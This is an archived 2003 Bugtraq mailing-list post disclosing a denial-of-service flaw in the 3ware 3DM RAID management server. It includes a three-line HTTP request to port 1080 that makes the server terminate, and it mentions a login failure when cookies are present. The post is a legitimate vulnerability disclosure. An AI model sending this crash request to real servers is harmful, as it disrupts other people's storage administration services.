3Ware 3DM denial of service attack

From: Neulinger, Nathan (nneul@umr.edu)
Date: 01/30/03

  • Next message: Jouko Pynnonen: "Apache Jakarta Tomcat 3 URL parsing vulnerability"
    Date: Thu, 30 Jan 2003 09:57:37 -0600
    From: "Neulinger, Nathan" <nneul@umr.edu>
    To: <bugtraq@securityfocus.org>
    

    I've reported this to 3ware at least twice, and never received any
    response. Previously I didn't have a test case other than "run a nessus
    scan against the host". I've narrowed it down to a reproducible minimum
    test case now.

    If you connect to 3dm port 1080 on either linux or windows and send:

    GET / HTTP/1.1
    Host: foo
    Accept-Charset: bar

    3dm server will terminate immediately.

    Other 3dm problems - it flips out and refuses to accept a login if you
    have ANY cookies sent. This screws you over if you have a sitewide
    .domain.edu cookie for example.

    -- Nathan

    ------------------------------------------------------------
    Nathan Neulinger EMail: nneul@umr.edu
    University of Missouri - Rolla Phone: (573) 341-4841
    Computing Services Fax: (573) 341-4216